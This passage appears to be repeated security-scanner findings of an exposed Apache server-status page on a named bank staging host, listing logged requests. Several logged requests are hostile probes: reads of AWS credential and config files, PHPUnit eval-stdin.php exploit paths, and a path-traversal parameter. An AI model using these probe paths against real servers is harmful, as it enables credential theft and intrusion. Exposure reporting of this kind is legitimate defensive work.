5.87612032903440.00.4918.89 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/cash-cash HTTP/1.1 1-7824448460/76/2463_ 5.75602272926900.00.4319.31 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/82/2502_ 5.75601822901510.00.5917.60 127.0.0.1http/1.1centralrefonte.projet-client.coGET /nous-connaitre/recrutement/formation/workers-at-an-it-comp 1-7824448460/78/2560_ 5.9044199273917
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25197c44cfc
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Sunday, 16-Nov-2025 21:08:33 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 77 Parent Server MPM Generation: 76 Server uptime: 75 days 9 hours 54 minutes 6 seconds Server load: 0.04 0.01 0.00 Total accesses: 156392 - Total Traffic: 1019.4 MB - Total Duration: 5245008 CPU Usage: u187.68 s264.81 cu271.53 cs86.72 - .0124% CPU load .024 requests/sec - 164 B/second - 6.7 kB/request - 33.5376 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 12033764no1yes10240010 22033763no0yes00250000 Sum201 10490010 .........................____________________W__________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.0015449090129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.0015449090150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.0015449090126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.0015449090142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.0015449090230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.0015449090354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.0015449090183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.0015449090183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.0015449090156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.0015449090112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.001544909298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.0015449091342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.0015449090149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.0015449090533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.0015449092135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.0015449090108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.0015449090105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.0015449090188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.0015449091115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.0015449090116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.0015449090138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.0015449090218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.0015449090166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.0015449090127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.0015449090131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-7620337640/35/2142_ 1.7770995130.00.0615.21 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-7620337640/40/2085_ 1.7770891720.00.0715.70 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-7620337640/38/2017_ 1.76110814460.00.0714.45 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-7620337640/36/2122_ 1.77801009370.00.0914.53 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-7620337640/34/2087_ 1.7690927710.00.0615.25 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-7620337640/32/2065_ 1.7690857690.00.0517.49 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-7620337640/37/2106_ 1.76901334660.00.0614.49 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-7620337640/34/2092_ 1.77201009800.00.0615.02 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-7620337640/32/2012_ 1.7730947470.00.0614.74 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-7620337640/42/2076_ 1.7740789320.00.0714.36 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-7620337640/37/2125_ 1.77501025980.00.0516.97 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-7620337640/33/2044_ 1.7750877680.00.0514.21 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-7620337640/40/2127_ 1.77601128650.00.0614.74 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-7620337640/35/2110_ 1.77701081040.00.0617.29 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-7620337640/33/2069_ 1.761001294410.00.0615.67 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-7620337640/40/2120_ 1.77201039770.00.0714.87 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-7620337640/31/2079_ 1.7720879730.00.0513.76 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-7620337640/35/2074_ 1.7710920860.00.0613.27 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-7620337640/42/2081_ 1.7700913900.00.0714.09 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-7620337640/29/2099_ 1.7800895650.00.0514.12 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-76203376425/30/2033W 1.6400960250.00.0515.16 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-7620337640/39/2068_ 1.76111896450.00.0714.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7620337640/31/2131_ 1.76110860840.00.0515.73 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-7620337640/31/2078_ 1.76110905580.00.0613.90 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-7620337640/30/2076_ 1.76100879090.00.0414.49 127.0.0.1ht
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251cdd6a8c3
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Monday, 17-Nov-2025 01:08:07 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 78 Parent Server MPM Generation: 77 Server uptime: 75 days 13 hours 53 minutes 40 seconds Server load: 0.00 0.00 0.00 Total accesses: 156604 - Total Traffic: 1019.8 MB - Total Duration: 5245274 CPU Usage: u186.48 s264.77 cu273.46 cs87.53 - .0124% CPU load .024 requests/sec - 163 B/second - 6.7 kB/request - 33.4939 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 12181886no0yes10240000 22181885no0yes00250000 Sum200 10490000 .........................______________W________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.0015592830129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.0015592830150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.0015592830126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.0015592830142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.0015592830230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.0015592830354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.0015592830183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.0015592830183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.0015592830156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.0015592830112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.001559283298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.0015592831342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.0015592830149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.0015592830533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.0015592832135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.0015592830108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.0015592830105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.0015592830188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.0015592831115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.0015592830116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.0015592830138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.0015592830218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.0015592830166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.0015592830127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.0015592830131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-7721818860/2/2147_ 0.0300995190.00.0015.23 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-7721818860/1/2089_ 0.0400891770.00.0015.71 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-7721818860/1/2021_ 0.0400814520.00.0014.46 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-7721818860/2/2126_ 0.04001009430.00.0014.54 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-7721818860/1/2091_ 0.0400927760.00.0015.26 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-7721818860/1/2069_ 0.0400857730.00.0017.50 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-7721818860/2/2111_ 0.04001334710.00.0014.50 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-7721818860/2/2096_ 0.05001009860.00.0015.03 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-7721818860/1/2016_ 0.0500947580.00.0014.75 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-7721818860/2/2081_ 0.0500789370.00.0014.37 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-7721818860/2/2129_ 0.05001026080.00.0016.98 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-7721818860/1/2048_ 0.0500877730.00.0014.22 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-7721818860/2/2132_ 0.05001128730.00.0014.75 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-7721818860/3/2115_ 0.05001081140.00.0117.30 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-77218188624/0/2072W 0.00001294440.00.0015.67 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-7721818860/1/2124_ 0.04001039850.00.0014.87 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-7721818860/1/2083_ 0.0500879760.00.0013.77 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-7721818860/2/2078_ 0.0500920910.00.0013.27 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-7721818860/1/2085_ 0.0500914000.00.0014.10 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-7721818860/1/2103_ 0.0500895740.00.0014.13 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-7721818860/2/2038_ 0.0500960400.00.0015.17 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-7721818860/0/2072_ 0.00891896510.00.0014.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7721818860/2/2137_ 0.0300860920.00.0015.74 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-7721818860/1/2082_ 0.0300905630.00.0013.90 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-7721818860/1/2081_ 0.0300879170.00.0014.50 127.0.0.1http/1.1127.0.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25141712760
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Friday, 14-Nov-2025 19:33:01 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 75 Parent Server MPM Generation: 74 Server uptime: 73 days 8 hours 18 minutes 34 seconds Server load: 0.00 0.02 0.00 Total accesses: 153383 - Total Traffic: 1014.2 MB - Total Duration: 5241500 CPU Usage: u182.75 s257.61 cu267.07 cs84.93 - .0125% CPU load .0242 requests/sec - 167 B/second - 6.8 kB/request - 34.1726 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 11737663no0yes00250000 21737662no0yes10240000 Sum200 10490000 .........................___________________________________W___ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.0013663770129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.0013663770150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.0013663770126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.0013663770142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.0013663770230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.0013663770354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.0013663770183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.0013663770183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.0013663770156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.0013663770112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.001366377298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.0013663771342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.0013663770149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.0013663770533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.0013663772135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.0013663770108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.0013663770105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.0013663770188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.0013663771115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.0013663770116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.0013663770138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.0013663770218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.0013663770166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.0013663770127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.0013663770131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-7417376630/18/2089_ 0.6026520994730.00.0315.13 127.0.0.1http/1.1127.0.1.1:8080GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 1-7417376630/16/2018_ 0.6430881891080.00.0315.59 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7417376630/16/1953_ 0.6327830813770.00.0114.34 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-7417376630/16/2061_ 0.60265201008700.00.0214.39 127.0.0.1http/1.1127.0.1.1:8080GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-7417376630/19/2034_ 0.6127830927180.00.0315.17 127.0.0.1http/1.1127.0.1.1:8080GET /index.php?lang=../../../../../../../../usr/local/lib/php/p 1-7417376630/21/2009_ 0.6620571857080.00.0317.40 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-7417376630/16/2041_ 0.63308001333820.00.0214.38 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/gateway/routes HTTP/1.1 1-7417376630/18/2040_ 0.60205201009330.00.0214.94 127.0.0.1http/1.1127.0.1.1:8080GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-7417376630/16/1955_ 0.6020520946770.00.0214.65 127.0.0.1http/1.1127.0.1.1:8080GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 1-7417376630/17/2017_ 0.608510788760.00.0214.27 127.0.0.1http/1.1127.0.1.1:8080GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-7417376630/20/2065_ 0.6685631025260.00.0316.88 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-7417376630/19/1988_ 0.608510877100.00.0314.12 127.0.0.1http/1.1127.0.1.1:8080GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-7417376630/15/2068_ 0.60398301128110.00.0314.64 127.0.0.1http/1.1127.0.1.1:8080GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval- 1-7417376630/20/2052_ 0.6668811080470.00.0317.19 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7417376630/19/2016_ 0.66265741293870.00.0215.58 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-7417376630/15/2062_ 0.60406601039170.00.0214.77 127.0.0.1http/1.1127.0.1.1:8080GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-7417376630/19/2026_ 0.6527881879020.00.0213.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7417376630/18/2015_ 0.634071330920240.00.0313.16 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7417376630/18/2020_ 0.606830913070.00.0314.00 127.0.0.1http/1.1127.0.1.1:8080GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-7417376630/19/2050_ 0.6030800895190.00.0314.04 127.0.0.1http/1.1127.0.1.1:8080GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-7417376630/17/1980_ 0.6430851959620.00.0315.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7417376630/16/2008_ 0.606830895530.00.0214.16 127.0.0.1http/1.1127.0.1.1:8080GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-7417376630/18/2079_ 0.6039830860250.00.0315.66 127.0.0.1http/1.1127.0.1.1:8080GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2510532c8da
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Wednesday, 12-Nov-2025 15:53:19 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 73 Parent Server MPM Generation: 72 Server uptime: 71 days 4 hours 38 minutes 52 seconds Server load: 0.09 0.08 0.09 Total accesses: 147505 - Total Traffic: 943.1 MB - Total Duration: 4881308 CPU Usage: u184.54 s250.92 cu247.24 cs80.84 - .0124% CPU load .024 requests/sec - 160 B/second - 6.5 kB/request - 33.0925 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 11274943no1yes10240010 21274942no0yes00250000 Sum201 10490010 .........................__W____________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.0011803950129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.0011803950150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.0011803950126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.0011803950142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.0011803950230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.0011803950354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.0011803950183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.0011803950183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.0011803950156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.0011803950112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.001180395298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.0011803951342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.0011803950149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.0011803950533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.0011803952135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.0011803950108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.0011803950105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.0011803950188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.0011803951115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.0011803950116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.0011803950138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 